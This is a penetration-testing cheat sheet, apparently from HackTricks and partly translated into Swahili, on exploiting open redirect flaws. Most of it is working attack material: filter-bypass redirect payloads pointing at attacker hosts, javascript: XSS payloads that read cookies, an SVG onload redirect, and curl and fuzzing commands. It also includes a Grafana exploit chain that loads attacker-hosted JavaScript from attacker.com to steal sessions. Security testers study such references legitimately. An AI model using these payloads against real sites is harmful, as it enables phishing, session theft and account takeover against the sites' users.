Open Redirect

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Open redirect

Redirect to localhost or arbitrary domains

Ikiwa app “allows only internal/whitelisted hosts”, jaribu notations mbadala za host ili notations tofauti za ku-refer ili kufikia loopback au anwani za ndani kupitia redirect target:
IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Hizi zinasaidia wakati tu “subdomains of X” zinakaribishwa lakini host resolution bado inaonyesha 127.0.0.1.
Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
//attacker.tld → hueleweka kama scheme-relative na hutumia scheme ya sasa kuelekeza mtumiaji nje ya tovuti ya sasa.
Userinfo tricks defeat contains/startswith checks against trusted hosts:
https://trusted.tld@attacker.tld/ → browser huelekea attacker.tld lakini ukaguzi rahisi wa string “ona” trusted.tld.
Backslash parsing confusion between frameworks/browsers:
https://trusted.tld@attacker.tld → baadhi ya backends hutumia “\” kama path char na hupitisha validation; browsers huzibadilisha kuwa “/” na kutafsiri trusted.tld kama userinfo, na kutuma watumiaji kwa attacker.tld. Hii pia inaonekana katika Node/PHP URL-parser mismatches.

URL Format Bypass

Modern open-redirect to XSS pivots

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Za kisasa zaidi URL-based bypass payloads

```text # Scheme-relative (current scheme is reused) //evil.example

Credentials (userinfo) trick

https://trusted.example@evil.example/

Backslash confusion (server validates, browser normalizes)

https://trusted.example@evil.example/

Schemeless with whitespace/control chars

evil.example%00 %09//evil.example

Prefix/suffix matching flaws

https://trusted.example.evil.example/ https://evil.example/trusted.example

When only path is accepted, try breaking absolute URL detection

/\evil.example /..//evil.example

</details>

## Open Redirect kupakia faili za svg
```html
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Vigezo vya injection vya kawaida

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

Mifano za Code

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

response.redirect("http://mysafedomain.com");

PHP

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>

Mtiririko wa Hunting na exploitation (kivitendo)

Ukaguzi wa URL moja kwa kutumia curl:

curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"

Gundua na fuzz vigezo vinavyowezekana kwa kiwango kikubwa:

Bonyeza ili kupanua

```bash # 1) Gather historical URLs, keep those with common redirect params cat domains.txt \ | gau --o urls.txt # or: waybackurls / katana / hakrawler

2) Grep common parameters and normalize list

3) Use OpenRedireX to fuzz with payload corpus

cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt

4) Manually verify interesting hits

awk ‘/30[1237]|Location:/I’ results.txt

</details>

- Usisahau client-side sinks katika SPAs: tafuta window.location/assign/replace na framework helpers zinazosoma query/hash na kufanya redirect.

- Frameworks mara nyingi huleta footguns wakati redirect destinations zinapotokana na input zisizo za kuaminika (query params, Referer, cookies). Tazama Next.js notes kuhusu redirects na epuka dynamic destinations zinazotokana na user input.

<a class="content_ref" href="../network-services-pentesting/pentesting-web/nextjs.md"><span class="content_ref_label">NextJS</span></a>

- OAuth/OIDC flows: matumizi mabaya ya open redirectors mara nyingi hupelekea account takeover kwa leaking authorization codes/tokens. Angalia mwongozo maalum:

<a class="content_ref" href="./oauth-to-account-takeover.md"><span class="content_ref_label">OAuth to Account takeover</span></a>

- Majibu ya server yanayotekeleza redirects bila Location (meta refresh/JavaScript) bado yanaweza kutumiwa kwa phishing na wakati mwingine yanaweza kuchained. Grep for:
```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>

Fragment smuggling + client-side traversal chain (Grafana-style bypass)

Server-side gap (Go url.Parse + raw redirect): validators ambazo zinaangalia tu URL.Path na kupuuza URL.Fragment zinaweza kudanganywa kwa kuweka external host baada ya #. Ikiwa handler baadaye anajenga Location kutoka kwenye unsanitized string, fragments leak back into the redirect target. Example against /user/auth-tokens/rotate:
Request: GET /user/auth-tokens/rotate?redirectTo=/%23/..//\//attacker.com HTTP/1.1
Parsing sees Path=/ and Fragment=/..//\//attacker.com, so regex + path.Clean() approve /, but the response emits Location: /\//attacker.com, acting as an open redirect.
Client-side gap (validate decoded/cleaned, return original): SPA helpers ambazo zina-decode kikamilifu path (ikiwa ni pamoja na double-encoded ?), zinaondoa query kwa ajili ya validation, lakini kisha kurudisha original string haziwazuia ../ zilizokuwa encoded kuishi. Browser decoding baadaye hubadilisha hayo kuwa traversal kwa endpoint yoyote ya same-origin (mfano, redirect gadget). Payload pattern:
/dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser/auth-tokens/rotate
The validator checks /dashboard/script/ (no ..), returns the encoded string, and the browser walks to /user/auth-tokens/rotate.
End-to-end XSS/ATO: chain the traversal with the fragment-smuggled redirect to coerce the dashboard script loader into fetching attacker JS:

https://<grafana>/dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser%2fauth-tokens%2frotate%3fredirectTo%3d%2f%2523%2f..%2f%2f%5c%2fattacker.com%2fmodule.js

Path traversal inafikia rotate endpoint, ambayo inatoa 302 kwa attacker.com/module.js kutoka kwa fragment-smuggled redirectTo. Hakikisha attacker origin inahudumia JS yenye permissive CORS ili browser iite, ikisababisha session theft/account takeover.

Zana

https://github.com/0xNanda/Oralyzer
OpenRedireX – fuzzer kwa kugundua open redirects. Mfano:

# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50

Marejeo

Katika https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect unaweza kupata fuzzing lists.
https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html
https://github.com/cujanovic/Open-Redirect-Payloads
https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a
PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
OpenRedireX – fuzzer kwa kugundua open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
Grafana CVE-2025-6023 redirect + traversal bypass chain

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.